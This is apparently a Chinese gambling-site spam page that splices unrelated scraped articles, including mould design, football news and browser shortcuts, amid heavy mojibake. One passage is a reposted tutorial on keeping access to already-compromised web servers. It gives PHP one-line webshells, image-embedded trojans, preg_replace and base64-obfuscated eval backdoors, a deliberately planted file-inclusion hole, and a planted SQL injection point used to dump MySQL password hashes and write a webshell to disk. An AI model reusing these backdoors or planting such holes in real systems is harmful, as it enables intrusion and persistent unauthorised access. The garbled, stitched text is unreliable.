九游 (中国)官方网站 - 九游游戏中心 _JIUYOU GAME

九游娱乐-包含/8鞽y葝P?7黴茔?,%7z遺鑏2泝?彎sy閨?└?嫰昫◢_腪~8?!踩?鐄PQ騔噡?伹 *渘U0??勜惠三x镸S6?%e媺bt噭?G.-H+銐?壠1锜M:?亸?[蛶玤?歽息9}?b?x羵P

Thu, 30 Apr 2026 00:55:17 +0800

2026年3月12日彩票开奖查询，到彩宝贝网本站彩票开奖结果彩票开奖时间与官方彩票开奖公告同步，让您第一时间掌握全国最新的彩票开奖结果手机版在线客服帮助。

凈窤€_拘]3搥槖E~k滔詪殉?x3剾&炒邯6穲嘘`A毼i┆楛j:(眪`?Y'腏5堞遉&9:瀠朤歫HGrC#_岝诎aPW?厧z饟Sf臋楎韒巁]?悏蝌城醬的词条" alt="包含/8鞽y葝P?7黴茔?,%7z遺鑏2泝?彎sy閨?└?嫰昫◢_腪~8?!踩?鐄PQ騔噡?伹 *渘U0??勜惠三x镸S6?%e媺bt噭?G.-H+銐?壠1锜M:?亸?[蛶玤?歽息9}?b?x羵P凈窤€_拘]3搥槖E~k滔詪殉?x3剾&炒邯6穲嘘`A毼i┆楛j:(眪`?Y'腏5堞遉&9:瀠朤歫HGrC#_岝诎aPW?厧z饟Sf臋楎韒巁]?悏蝌城醬的词条">

在线娱乐-包含N?鄓?鲯袧4?V[A8雹?`柨?c?怗ョ胕y璠T8灁崃?躉i瀁頖B+??hJzjk"寷弿s海琻?]Uェ砅)?.f??賋倚佭虣@?n9#纭kL福^M媝汓?VkPF垓hx浫9闅IG瘩夞摧撶泗?z.斶]?朓sq啵rz?ss?]+n鉸?E9nTE獣糀c"BC鋰晬i^!,?\C榞嫱@樘劯?銋屹:后綡YK鐝蘳塒 p?93鈻縌︶?7揣:徥K蘢F扈y2科?閏?膚8;gF的词条

Wed, 29 Apr 2026 14:50:42 +0800

　　我们都知道普通的斜顶机构是由斜顶杆、导向块、斜顶座组成，斜顶角度最好取3°—12°，对于一些电子类的产品，倒扣小的可以适用，但对于一些汽车类产品，倒扣较大的，斜顶角度无法满足。那么汽车模的斜顶机构是怎么设计的呢？我来跟大家分享一下汽车模斜顶机构的设计方法。- I$ s) Y, X, C4 [' E+ i3 l1.汽车模斜顶机构的组成* T8 V- c) h- m7 R! X6 w

2.斜顶头的设计注意事项 2 }. d' W5 W9 i" j

　　; L4 Y! T/ w6 Y6 ]（1）斜顶头是扣位的成型零件，不易加工，设计的时候必须要有两个基准面成90°角度 ! S# D, a% F) f6 E. ^* e6 j) b# a/ h0 B8 p% G* H: t" i2 c7 K+ d' e+ h

8 t% W- w' _. Z, m' c$ r* z3 T

（2）斜顶头与斜顶杆的连接方式可以用压板压住，也可以用定位销连接，还可以做整体式的斜顶，如下图所示：

5 C6 X. y6 R8 q; v7 M

* f1 o3 m2 b% q' l3 C; G8 G8 M9 ^

( r/ R# g" q2 b# ^5 P

, T4 t6 m; a+ c, |% G- W

% h6 y8 g! n5 ]/ O

9 M& f. E9 V3 9 |: A

3.斜顶杆的设计与作用

　　- i M, E& O8 e' |) n! E7 R斜顶杆的角度可以设计到15°以下，与斜顶头和滑块连接，杆的大小一般取直径16或者20mm,固定方式可以用压块压死。 2 P: K4 Q/ [% j$ {& T! J) d. Z* ]5 p3 ?6 ~: `" T2 X- Q# K

4.导向块的设计及作用 : q- s0 _) l; J% T$ D

　　# ? e N' 4 x) O/ a3 y导向块是锁在B板底部，它的作用是导向斜顶杆和固定斜导柱，用两支螺丝锁紧 . M5 }. I; m9 a0 ], a7 V。8 b' s2 : G% j

2 a0 Y/ p1 }3 z3 m; |$ N

頖B+??hJzjk"寷弿s海琻?]Uェ砅)?.f??賋倚佭虣@?n9#纭kL福^M媝汓?VkPF垓hx浫9闅IG瘩夞摧撶泗?z.斶]?朓sq啵rz?ss?]+n鉸?E9nTE獣糀c"BC鋰晬i^!,?C榞嫱@樘劯?銋屹:后綡YK鐝蘳塒 p?93鈻縌︶?7揣:*徥K蘢F扈y2科?閏?膚8;gF的词条" alt="包含N?鄓?鲯袧4?V[A8雹?`柨?c?怗ョ*胕y璠T8灁崃?躉i瀁<?(]?鯲>頖B+??hJzjk"寷弿s海琻?]Uェ砅)?.f??賋倚佭虣@?n9#纭kL福^M媝汓?VkPF垓hx浫9闅IG瘩夞摧撶泗?z.斶]?朓sq啵rz?ss?]+n鉸?E9nTE獣糀c"BC鋰晬i^!,?C榞嫱@樘劯?銋屹:后綡YK鐝蘳塒 p?93鈻縌︶?7揣:*徥K蘢F扈y2科?閏?膚8;gF的词条">

4 _! F# _# o2 C3 z+ @

6 s1 _) T8 h" c O- H0 w/ ~

5.斜导柱的设计及作用

　　% N1 Y" a( K5 C斜导柱是锁在底板上，它的角度与斜顶杆角度一样，主要的作用是驱动滑块，使斜顶侧向抽芯，设计时注意滑块座要避空，避免干涉，影响顶出。 ' a& t/ H" |9 G' N3 I! i$ Z- b

6 Q' h+ i: @9 J

, g5 ?, d0 H1 r1 Q3 d8 d: N

' w' V* f; _4 H9 Q* v1 t

; p' |) Y) x$ v( S" z* @8 @* _

6.滑块及滑块座的设计及作用

　　滑块与斜顶杆连接在一起，顶出时滑块由于斜导柱的作用侧向滑动，带动斜顶侧向抽芯，滑块座起到导向滑块和耐磨的作用，固定在顶针面板上。 0 u" H! O- ~* Z; z* V8 E) b" }& C" R# r: p% P

九游体育下载-窗口期突围战来临，浙江稠州围绕德甲完成体检，话题不断，阵容厚度经受考验(围点打援六大经典战术)

Wed, 29 Apr 2026 04:45:14 +0800

　　尽管曼城今夏在转会市场上花了7100万英镑，但真正对一线队有帮助的球员仅有两名，分别是斯特林和德尔菲，其中后者被定义为替补；曼城若想在未来一个赛季中重新夺得英超冠军，且在欧冠赛场有所突破，那么现在仍需要加强，舰队街给出的消息是，佩德罗、德布劳内和奥塔门迪均是蓝月亮的猎物；北京时间8月13日，英国媒体《每日邮报》头条消息称，曼城不会同时收购佩德罗和德布劳内，两者其中只会选其一，且无法签下德布劳内的情况下，才会考虑佩德罗，也就是说，佩刀只是B计划。

　　按照英国媒体《镜报》的说法，在当地时间8月10日，曼城就德布劳内的转会已向沃尔夫斯堡进行了报价，筹码为4700万英镑（一说是4600万英镑），德甲球会没有同意，但也没有拒绝，这表明德布劳内的转会有的谈。与此同时，曼城私下开出惊天合同诱惑德布劳内，如果比利时巨星加盟伊蒂哈德，那么他将得到一份6年期20万英镑周薪的合同，薪水要比在沃尔夫斯堡多得多。对于曼城的诱惑，沃尔夫斯堡体育经理阿洛夫斯亲承会动摇德布劳内，“我认为其他俱乐部确实会动摇德布劳内，从经济的角度来看，我能够理解他的想法，他肯定也需要听取这些报价，我也不指望他会说自己不会关注这些东西。”

　　与此同时，德布劳内经纪人科斯特日前接受采访时，证实了曼城要收购丁丁的消息，“德布劳内现在仍是一名沃尔夫斯堡球员，他专注于自己的工作和狼堡俱乐部，我在媒体上看到了许多无谓的报道。我们正在等待两家俱乐部的谈判结果，现在还没有到达体检阶段，德布劳内在沃尔夫斯堡过得很开心。”可以证实，曼城就德布劳内的转会已与沃尔夫斯堡开启谈判。听到德布劳内要加盟曼城的消息后，比利时同胞、曼城队长孔帕尼非常期待，“让我们这么说吧，德布劳内绝对不会让这支球队实力变弱。他在任何球队都能让他们变得更强，他是现象级的球员，一名成熟的球员。”

　　现年24岁的德布劳内司职攻击型中场，比利时国脚，曾在2012年到2014年间在切尔西效力过，但未能在斯坦福桥立足，甚至一度被租借至不莱梅；去年1月份，德布劳内以1800万英镑的价格加盟沃尔夫斯堡，成为他职业生涯的转折点，71场比赛攻入20球助攻38次，上赛季帮助球队拿到德甲亚军且获得队史上第一座德国杯冠军。英国媒体《镜报》指出，一旦曼城敲定德布劳内的转会后，将强攻奥塔门迪，以加强孱弱的后防线，上赛季孔帕尼和曼加拉出现多次低级失误，蓝月亮深受其害。

　　据悉，奥塔门迪的合同毁约金高达3500万英镑，曼城想顺利签下他很不容易，如果蓝月亮真的激活毁约金条款，那么阿根廷球星将成为英伦足坛最昂贵的中后卫，打破去年由曼加拉保持的3200万英镑记录。奥塔门迪除了防守出色外，进攻也很有特点，是一名不折不扣的带刀后卫，上赛季35场西甲联赛打入6球，其中一个进球帮助瓦伦西亚2-1逆转皇马，终止银河战舰22连胜的记录。

　　（十九）

　　（责任编辑:UX042）

九游娱乐官网-包含苙m_?粤V??gd4:短蚽槍_)jɡD雨_,?獮*l?W?K哦g叅-|桯2的词条

Tue, 28 Apr 2026 18:40:05 +0800

　　电脑的便利不言而喻，办公、生活、娱乐都离不开电脑。当我们打开浏览器浏览网页时常常会情不自禁的打开很多标签页，有的时候标签页实在太多以至于用鼠标切换都有些麻烦。通常情况下可以使用F2和F3来进行左右标签的切换，F2向左，F3向右，滑动鼠标右键成L型即可关闭当前标签页等。

　　那么，浏览器还有哪些快捷键可以应用呢？

　　除了系统自带的浏览器外，诸如360浏览器、谷歌浏览器、QQ浏览器、百度浏览器、遨游浏览器、火狐浏览器等是网友们使用最频繁的浏览器。浏览器之间的快捷键或许有一定细微的不同，但是大体上实用性更强的快捷键还是较为一致的。

　　标签页“键盘”快捷键：

　　Ctrl + 1--8：指定标签页快捷键，从左1至右8，根据序号即可切换至对应标签页。

　　Ctrl + 9：切换至最后一个标签页，无论浏览器中有多少标签页，直接切换最后一个。

　　Ctrl + Tab：切换下一个（向右）标签页；单独按F3有同样作用。

　　Ctrl + Shift + Tab：切换上一个（向左）标签页；单独按F2有同样作用。

　　Ctrl + W、Ctrl + F4：两个组合键功能相似，关闭当前标签页。

　　Ctrl + Shift + T：重新打开上一个关闭的标签页，适用于关闭某个标签页后重新打开。

　　Ctrl + T：打开一个新的标签页。

　　Ctrl + N：打开一个新的浏览器窗口。

　　Ctrl + E：复制并新打开当前标签页。

　　Ctrl + H ：打开浏览记录。

　　Ctrl + J：打开下载记录。

　　Ctrl + D：为当前网站添加书签。

　　Ctrl + Shift + Del：打开清除浏览历史记录窗口。

　　Alt + F4：关闭当前窗口。

　　标签页“鼠标”快捷键：

　　鼠标右键：向下+向右画一个L，非常实用的关闭标签页的方法。

　　鼠标右键：向左画一个一，标签后退上一个页面。

　　鼠标右键：向右画一个一，标签前进下一个页面。

　　鼠标右键：向上画一个1，标签页内容向上翻。

　　鼠标右键：向下画一个1，标签页内容向下翻。

　　标签页“键盘+鼠标”组合快捷键：

　　Ctrl + 左键：单击标题或链接，在新打开的标签页中显示。

　　Shift + 左键：单击标题或链接，在新打开的网页窗口中显示。

　　Ctrl + 滚轴：滚轴向前滚动为放大网页，滚轴向后滚动为缩小网页。

　　Ctrl + 0：“0”为阿拉伯数字0，标签页放大或缩小后，一键回归至标准大小100%

　　教你如何自定义网页快捷键

　　什么叫自定义网页快捷键？

　　大意就是将你平日经常访问的网页（网址）添加到快捷键中。

　　那么，能否自定义设置网页快捷键呢？答案是可以的。

　　开启电脑后，启动Wise Hotkey工具即可自定义设置快捷键，它不仅可以自定义设置网页，还可以自定义任何应用软件、文件夹或文档，达到快速启动的目的。

　　如上图，点击添加按钮，选择需要添加快捷的类型，应用、文件或网址，输入网址点击“添加url”，即可完成添加。以后想访问该网站按下快捷键即可。

九游体育下载-窗口期欧冠传出新动向，托特纳姆止住颓势，管理层表态：话题不断，年轻球员得到机会的简单介绍

Tue, 28 Apr 2026 08:35:25 +0800

并且得到了前副队长吉尔伯托留下的19号战袍，并为一线队出场8次，创下了阿森纳俱乐部的两项新纪录，英超联赛最年轻出场球员此前由队长法布雷加斯保持，2008年9月13日，16岁256天，布莱克本VS阿森纳欧冠最年轻出场球员此前由沃尔科特保持i，2008年11月25日，16岁329天，阿森纳vs迪纳莫基辅；迪米塔·贝尔巴托夫Dimitar Berbatov，1981年1月30日生于保加利亚布拉戈耶夫格勒，保加利亚籍足球运动员，场上司职前锋，现效力于印度超级联赛的喀拉拉爆破者足球俱乐部贝尔巴托夫亦是保加利亚国家队前任队长，在2010年因个人原因退出了国家队贝尔巴托夫在保加利亚国家队长期都有着很高的进球率，因此他。

英国当地时间1月30日，QPR正式宣布租借托特纳姆热刺的韩国球员梁民革，号码为47号与其在江原FC获赛季最佳新人时的号码一致球员表态梁民革在官方采访中表示“很高兴加盟QPR，这里曾是朴智星效力的球队我选择这里是为了获得更多比赛机会，帮助球队升级实现梦想”首秀预期2天后客场与米尔沃尔的比赛，梁民革有望完成。

九游体育app-轜?u:Le?V?>葨?凞er?攒粎綶?

Mon, 27 Apr 2026 22:30:12 +0800

　　关于权限维持，我之前写过一篇基于系统端的后门技术文章，如映像劫持啊，lpk之类。当然啦，在拿到权限后，在web端做手脚也是个好办法。

　　内容目录

　　- 构造文件包含漏洞

　　- 隐蔽性脚本木马

　　- 构造sql注入点

　　构造文件包含漏洞

　　本部分概览

　　* 基本的文件包含姿势

　　* 制作图片马

　　* 构造文件包含漏洞

　　>>>>

　　PHP文件包含漏洞介绍

　　首先，我们来介绍下何为文件包含漏洞。严格来说，文件包含漏洞是`代码注入`的一种。其原理就是注入一段用户能控制的脚本或代码，并让服务端执行。`代码注入`的典型代表就是文件包含。文件包含漏洞可能出现在`JSP、PHP、ASP`等语言中，原理都是一样的，本实验以PHP文件包含漏洞做例子。

　　要想成功利用文件包含漏洞进行攻击，需要满足以下两个条件：

　　1. Web应用采用include()等文件包含函数通过动态变量的方式引入需要包含的文件;

　　2. 用户能够控制该动态变量。

　　在PHP中，有四个用于包含文件的函数，当使用这些函数包含文件时，文件中包含的PHP代码会被执行。下面对它们之间的区别进行解释：

　　`include()`:当使用该函数包含文件时，只有代码执行到`include()`函数时才将文件包含进来，发生错误时只给出一个警告，继续向下执行。

　　`include_once()`:功能和`include()`相同，区别在于当重复调用同一文件时，程序只调用一次。

　　`require()`:`require()`与`include()`的区别在于`require()`执行如果发生错误，函数会输出错误信息，并终止脚本的运行。使用`require()`函数包含文件时，只要程序一执行，立即调用文件，而include()只有程序执行到该函数时才调用。

　　`require_once()`:它的功能与`require()`相同，区别在于当重复调用同一文件时，程序只调用一次。

　　步骤1 基本的文件包含姿势

　　以下所有步骤建立在已经取得目标机权限的情况下。

　　我们假设事先通过一系列的渗透测试得到了目标机的一句话webshell。

　　假设我们事前得知，目标服务器的一些脚本文件存在文件包含漏洞，如：

　　/clude.php?file=index.php

　　其参数`file`没有作很好的过滤，可以包含任意文件。

　　比如，我们在漏洞文件`clude.php`同目录新建一个文件`getshell.php`，内容是PHP一句话木马：

　　<?php @eval($_POST['pass']);?>

　　使用中国菜刀进入文件管理功能并如下操作，那么我们尝试通过`clude.php`包含脚本木马`getshell.php`：

　　/clude.php?file=getshell.php

　　点击`Enable Post data`调出POST数据栏，并POST以下数据：

　　pass=system('set');

　　此处传递的变量是通过调用PHP的`system()`函数执行`set`命令来查看当前系统的环境变量。

　　当然，这里直接包含了一个木马文件，在我们已经有了webshell的情况下，这好像并没有很大意义。隐蔽性并不是很强。

　　步骤2 制作图片马

　　PHP文件包含，其包含的文件无论是什么格式，都会被当做PHP文件来解析。

　　那么，如果恶意代码被插入到了一个正常的网页图片中，而且图片在被插入恶意代码之后还能正常显示，那隐蔽性就增强了。

　　图片木马其实还有另一点意义，有些网站我们在渗透测试尝试上传shell的时候，会要用到上传文件，但是有的时候都会有过滤，如果只是上传`.asp .php`结尾的文件的话系统是不会给你上传的，那么这个时候我们通常会把一句话放在图片里面，写成`1.asp;.jpg或1.asp;jpg`的格式上传上去，这样上传的时候系统检测是图片，然后在上传之后，会把这个文件当asp文件来处理。

　　那么如何用制作图片形式的一句话木马呢？

　　首先我们在工具目录准备了一个图片文件`1.png`，和一个一句话木马文件`hack.php`。

　　准备好之后就在该目录开启命令行，然后输入以下命令：

　　copy 1.png/b+hack.php test.png

　　然后回车就系统就会自动把这两个文件组合起来并命名为`test.png`：

　　这个时候我们打开两个文件对比一下，用记事本打开，发现`1.png`的内容当中已经把我们的`hack.php`的一句话木马语句已经加加到图片当中去了。

　　当然了，最重要的是，被写入了一句话的图片还是可以正常打开的，此为本步骤的目的所在：

　　那么，在实际渗透测试实验中，我们通常是通过下载网站原有的图片文件并替换成一句话木马最后通过替换原本的图片文件达到一定的隐蔽效果。

　　那么我们试试该图片木马是否可用，先通过中国菜刀的文件上传功能把`test.png`上传到目标机根目录：

　　那么我们尝试通过`clude.php`包含一句话图片木马`test.png`：

　　/clude.php?file=test.png

　　点击`Enable Post data`调出POST数据栏，并POST以下数据：

　　pass=system('set');

　　此处传递的变量是通过调用PHP的`system()`函数执行`set`命令来查看当前系统的环境变量。

　　当然，这里还是直接包含了一个木马文件，在我们已经有了webshell的情况下，这好像并没有很大意义。隐蔽性并不是很强。

　　步骤3 构造文件包含漏洞

　　那么假设我们拿到shell的服务器上的脚本文件都不存在文件包含漏洞就需要我们自己来构造漏洞了，以达到权限维持的效果。

　　文件包含漏洞的脚本文件的构造就比较简单了，直接写一个不带有任何过滤的利用`include()`函数调用文件的PHP文件，文件代码及相关的注释如下：

　　<?php

　　$filename=$_GET['filename']; //将参数file的值传递给$filename变量include($filename); //使用include()函数包含文件

　　上述代码我们已经保存在工具目录的`include.php`，我们使用中国菜刀的文件管理功能把`include.php`上传到目标站根目录：

　　接下来我们在浏览器访问以下URL以包含图片木马`test.png`：

　　此处的PNG文件被当做是PHP文件解析，于是直接显示了图片乱码，我们在乱码最后并没有发现我们的一句话木马痕迹，于是推断我们的一句话木马已经被解析。

　　接着我们点击`Enable Post data`调出POST数据栏，并POST以下数据：

　　pass=system('net user');

　　此处传递的变量是通过调用PHP的`system()`函数执行`set`命令来查看当前系统的环境变量。

　　我们在图片乱码下面可以看到`net user`命令的回显。

　　至此，图片木马被成功部署并利用。

　　隐蔽性脚本木马

　　本部分概览：

　　* 使用`preg_replace`函数留后门

　　* 使用加密`preg_replace`函数

　　* 变异加密型后门

　　步骤1 使用`preg_replace`函数留后门

　　其实我们可以通过如下代码实现了隐藏式后门：

　　<?php @preg_replace("//e",$_POST['IN_COMSENZ'],"Access Denied");?>

　　乍看到这个代码觉得没什么问题，这里用到的是php的`preg_replace`函数：

　　- `preg_replace`函数原型:

　　mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit])

　　特别说明:

　　`/e`修正符使`preg_replace()`将`replacement`参数当作 PHP代码(在适当的逆向引用替换完之后)。

　　提示：要确保`replacement`构成一个合法的 PHP 代码字符串,否则 PHP 会在报告：在"包含 `preg_replace()` 的行中出现语法解析错误."上面的代码是POST接收数据，实现可能不太直观，如果换成GET获取数据的话可以更好地理解：

　　举例，代码如下:

　　<?php echo preg_replace("/test/e",$_GET["h"],"jutst test");?>

　　我们假设事先通过一系列的渗透测试得到了目标机的一句话webshell。

　　在中国菜刀的文件管理页面右键，新建一个`test.php`，内容是上述的`get`方式提交的一句话：

　　<?php echo preg_replace("/test/e",$_GET["h"],"jutst test");?>

葨?凞er?攒粎綶?<幬iC拋/?tSWiG僀逫"??Q仾伂1p柄%愕?h€9癩冇b??k﹋7Bヲ矊T琠J鵵F?釭婯筱.b#懧'軨{绡&???€C髉皠?x?ｂ幫??j獣蚮埁裺膓9R澥b禐骒⊿o憪c?&O釙賤▔?h錃V杖w跣Fg?郴;鬥?,穄 ?凖祮u:膧臽4駄?B(拑种拊拏柃沰絆mrs)" alt="轜?u:Le?V?>葨?凞er?攒粎綶?<幬iC拋/?tSWiG僀逫"??Q仾伂1p柄%愕?h€9癩冇b??k﹋7Bヲ矊T琠J鵵F?釭婯筱.b#懧'軨{绡&???€C髉皠?x?ｂ幫??j獣蚮埁裺膓9R澥b禐骒⊿o憪c?&O釙賤▔?h錃V杖w跣Fg?郴;鬥?,穄 ?凖祮u:膧臽4駄?B(拑种拊拏柃沰絆mrs)">

　　如果我们提交`?h=phpinfo()`即是通过传参执行了PHP的`phpinfo()`函数。

　　即在浏览器访问以下URL传递需要执行的变量函数`phpinfo()`：

　　/test.php?h=phpinfo();

　　如上图可见`phpinfo()`将会被执行（用`/e`修饰符，`preg_replace`会将`replacement`参数当作PHP代码执行）。

　　在PHP中，双引号里面如果包含有变量，php解释器会将其替换为变量解释后的结果，单引号中的变量不会被处理。

　　**注意：**双引号中的函数不会被执行和替换。

　　步骤2 使用加密`preg_replace`函数

　　我们准备了一个加密`preg_replace`函数的一个php后门文件：

　　文件内容如下：

　　上述代码最后解密出来其实还是利用`preg_replace`的`/e`来执行的一句话webshell。

　　代码中的md5值`202cb962ac59075b964b07152d234b70`明文是`123`。

　　我们先通过上个步骤中的一句话木马把`test1.php`上传到目标机根目录，该木马的利用方式是访问该文件并通过POST方式提交类似如下数据：

　　pass=123&check=phpinfo();

　　那么我们在浏览器POST数据一般是通过火狐浏览器的hackbar插件，火狐浏览器的的Hackbar插件的POST数据栏默认是不开启的，我们需要勾选上图红圈中的部分已启动POST栏。

　　启动POST栏之后，我们在`Post data`一栏输入以下数据来POST给服务器：

　　pass=123&check=phpinfo();

　　上述POST的数据是尝试执行`phpinfo()`函数：

　　如上图可见，`phpinfo()`函数被成功执行。

　　当然我们还能通过`system()`函数来执行系统命令：

　　如通过火狐浏览器的Hackbar插件POST以下数据：

　　pass=123&check=system('set')

　　上述POST的数据中就是执行了系统命令`set`查看当前操作系统环境变量，如上图，我们成功取得了返回。

　　步骤3 变异加密型后门

　　我们这里准备了一个PHP脚本后门，代码很是奇葩，源代码如下：

　　上述源码，光看看你是看不出什么端倪的。我们为了方便大家看到上述代码到底做了些什么，对代码做了输出调试处理，输出每个步骤的输出，并对代码做了一些详细的解释：

　　做了调试的的源码我们命名为`base1.php`:

　　接着我们使用中国菜刀把上述两个文件`base.php`和`base1.php`都上传到网站根目录。

　　好了之后我们访问已经做了调试的`base1.php`：

　　```

　　https://172.16.12.2/base1.php

　　```

　　如上图可见，php文件运行起来后输出结果如下：

　　上述代码文件我们是一步一步输出的，输出到最后，我们发现，生成的竟然是经典的PHP版一句话木马文件代码：

　　eval(_decode($_POST[‘z0’]))

　　上述一句话木马文件中在POST数据外加了`_decode`函数，于是我们需要对变量的提交做``加密处理。

　　`base.php`上传之后具体的URL地址如下：

　　我们在火狐浏览器访问该文件，并使用Hackbar插件直接提交下面的数据是不行的：

　　```

　　z0=phpinfo();

　　```

　　我们需要把对`z0`变量的赋值进行加密，加密后的数据形式如下：

　　```

　　z0=cGhwaW5mbygpOw==

　　```

　　我们直接选中`z0=phpinfo();`中的`phpinfo();`，然后点击`Encoding`->` Encoding`，如此`phpinfo();`将会被加密：

　　加密完成后，我们点击`Execute`提交：

　　如上图，`phpinfo()`函数被成功执行。

　　那么我们也可以尝试执行系统命令如`net user`:

　　常规来说，我们提交的是如下数据：

　　```

　　z0=system('net user');

　　```

　　在这里我们就需要对变量的赋值`system('net user');`部分进行加密，选中POST栏的`phpinfo();`，然后点击`Encoding`->` Encoding`，然后POST的数据变成如下形式：

　　```

　　z0=c3lzdGVtKCd2ZXInKTs=

　　```

　　加密完成后，我们点击`Execute`提交：

　　如上图可见，`net user`命令被成功执行而且我们获得了清晰地返回信息。

　　构造sql注入点

　　本部分概览：

　　* 构造注入点

　　* 利用构造的注入点

　　本部分以php脚本和MySQL数据库为例，演示在获得目标机权限之后，在目标机上面构造一个注入漏洞方便我们后续隐蔽性维持权限的方法。

　　步骤1 构造注入点

　　我们假设事先通过一系列的渗透测试得到了目标机的一句话webshell。

　　打开中国菜刀工具添加一句话木马，注意数据库配置信息填写如下数据（事先获得）：

　　<T>MYSQL</T>

　　<H>localhost</H>

　　<>root</P>

　　<N>mysql</N>

　　使用中国菜刀进入到目标机的数据库管理功能：

　　在中国菜刀的数据库管理功能页面执行以下语句以创建一个新的数据库：

　　```

　　create database sqlinject;

　　```

　　然后退出该数据库管理页面，在重新进入数据库管理页面就能看到新建的数据库`sqlinjec`了，我们双击该数据库名切换到该数据库：

　　然后执行以下语句在`sqlinject`数据库中建立表和列：

　　```

　　create table admin(id int auto_increment primary key,username varchar(32) not null,password varchar(32) not null);

　　```

　　再执行以下语句想表中的列写入字段值：

　　```

　　insert into admin (username,password) values ('admin',md5('admin')),('safe',md5('12345')),('test',md5('test'));

　　```

　　然后我们双击查看`inject`数据库下各项，可以看到数据已经写入。

　　接下来我们需要构造脚本文件调用上述数据库，脚本文件内容如下：

　　该文件上传完毕后，我们根据上述脚本内容推测，构造的sql注入点如下：

　　/test.php?id=1

　　步骤2 利用构造的注入点

　　根据我们之前讲的sql注入相关知识，我们尝试通过构造以下语句读取数据库用户相关信息：

　　test.php?id=-1 union select concat(host,0x7c,user,0x7c,password),2,3 from mysql.user where host = 'localhost'#

　　>我们把参数从1改为-1是为了防止当前查询的返回结果影响我们到时候提取指定文本。

　　>`concat()`函数把多个需要查询的字段放在一起

　　>`0x7c`是`|`符号的16进制转码结果，有利于我们到时候把字段区分开。

　　我们得到以下具体信息：

　　localhost|root|*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B

　　如此得知本地主机`localhost`的`root`账户的密码hash是`*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B`。

　　实际渗透测试中，我们可以通过`cmd5.com`的大型hash破解平台来破解密码，我们这里通过线上破解得知，此hash对应的密码值为`root`。这些信息可以用来后续的mysql提权。

　　后来假设我们之前的一句话木马被管理员删除了，然而我们还是可以利用上述我们创建的sql注入点向服务器再写入一个脚本木马。

　　然后我们尝试在这里写一个一句话webshell到服务器，一句话木马样本如下：

　　<?php @eval($_POST['pass']);?>

　　我们在火狐浏览器的HackBar插件把上述一句话木马转换为16进制，目的是避免特殊字符的转义导致语句不能正确执行：

　　如图，一句话木马加密后的结果为：

　　3c3f70687020406576616c28245f504f53545b2770617373275d293b3f3e

　　然后在注入点构造以下语句把一句话导出到`c:/www/small.php`，我们在一句话木马的16进制字符前加了`0x`（此为16进制标识符）：

　　以上语句连续执行两次，如果出现以下错误，即说明文件写入成功：

　　Invalid Query：File 'c:/www/small.php' already exists//第二次写入提示文件已存在则说明文件写入成功

　　我们尝试使用中国菜刀连接一句话木马，如下图操作：

　　至此，我们成功够早了sql注入点并成功利用其向目标机写入了新的webshell。

　　分析与总结

　　主要学习了以下内容：

　　- 隐蔽性脚本木马

　　- 畸形目录隐藏shell

　　- 构造文件包含漏洞

　　- 构造sql注入点

　　通过本实验，我们学习了几种比较奇特的隐蔽性的脚本木马的原理和利用方式，目的在于维持web端的权限。还学习了基本的文件包含漏洞的利用、图片木马的制作，以及如何构造文件包含漏洞以便我们后续维持web端权限、在目标服务器web端构造sql注入点用以后续维持权限的方式。

　　当然，web端权限维持技术各种各样，不仅于此，只有你想不到，没有渗透测试人员做不到。

　　若涉及敏感操作，请在法律允许的范围内测试！

　　作者：Binghe

　　来源：i春秋

　　链接：https://bbs.ichunqiu.com/thread-19144-1-1.html

炼石信息安全培训春季班开招

QQ：495066536

372806985

敬请持续关注……

九游体育下载-包含E8咼佡lT梗8f(FjCK妦)鵵?的词条

Mon, 27 Apr 2026 12:25:02 +0800

1、2023年10月6日您在查找原来如此英语梗短视频信息吗？抖音短视频帮您找到更多精彩的如此视频内容！让每一个人看见并连接更大的世界，让现实生活更美好精选推荐直播。

2、2026年2月10日一句英语梗引爆50亿播放！成何体统解锁穿书剧新范式 2026年开年，古装穿书剧成何体统凭借脑洞大开的设定与接地气的喜剧表达强势破圈，一句课本英。

3、2024年11月28日这些英语梗你get到几个？#英语 #海外 #留学 #日常英语 #海外生活克里斯世界环游记于28发布在抖音，已经收获了22426万个喜欢，来抖音，记录美好。

九游体育app-今夜欧联焦点战，圣安东尼奥马刺手感冰凉，赛场秩序良好，赛季目标并未改变的简单介绍

Mon, 27 Apr 2026 02:20:28 +0800

圣安东尼奥马刺，这支曾经风光无限的球队，如今却陷入了困境，战绩不佳，让人不禁感叹“童话里都是骗人的”以下是对马刺现状的详细分析战绩低迷马刺目前以6胜12负的战绩排在西部第13名，这样的成绩显然与球迷的期望相去甚远作为上赛季的季后赛球队，马刺的陨落速度之快，让人猝不及防阵容问题马刺在休赛期的操作并。

NBA达拉斯独行侠与圣安东尼奥马刺的比赛将于0411 0930进行，独行侠优势明显，本场更被看好能赢下比赛并打穿数据具体分析如下独行侠队情况目标与条件独行侠这场比赛有机会争取西部第三的位置，前提是勇士队最后一场比赛不能获胜近期状态近期状态火热，打出了三连胜的表现，且上场比赛已经回到。

杰佛里洛韦尔涅是一名来自法国的篮球运动员，曾加盟圣安东尼奥马刺队杰佛里洛韦尔涅在加入圣安东尼奥马刺队之前，已经在联盟中度过了三个赛季这位25岁的中锋在加盟马刺时，身高6尺11寸约211米，体重220磅约100公斤，以其多才多艺和全面的技能而著称他能够胜任多个位置，并展示了出色。

九游娱乐-浙江队训练开放日，赛后战术微调引欢呼，英超在即，赛程密集仍需轮换的简单介绍

Sun, 26 Apr 2026 16:15:10 +0800

大连人队主教练谢晖出席了赛后新闻发布会谢晖浙江队从任赛程是三四天一场，这是英超和欧冠的强度，没有轮换是非常困难。

浙江广厦新赛季出征仪式在杭州举行广厦球员孙铭徽表示“希尽早确立技战术打法和应变策略，打好第一场比赛，确立良好的开；浙江队近来状态不佳，上轮惨败申花后，近7轮2胜5负只拿到6分，赛后主帅乔迪表达了对球队的不满，认为很多球员都不在状态，在岳。

赛后他表示，对手发挥比以往更稳定，其中徐承宰球风变得硬朗，英超第3轮，十人利物浦客场21逆转纽卡比赛第27分钟，范迪克。

现在不该质疑小因扎吉曼联4月英超赛程共踢7场，4月23日28 赛后，安切洛蒂接受采访时被问到“14分钟0比2落后时在想什么。

九游体育下载-冲刺阶段阿斯顿维拉官宣签约——法甲节点到来；球迷炸锅；数据趋势出现新变化的简单介绍

Sun, 26 Apr 2026 06:10:14 +0800

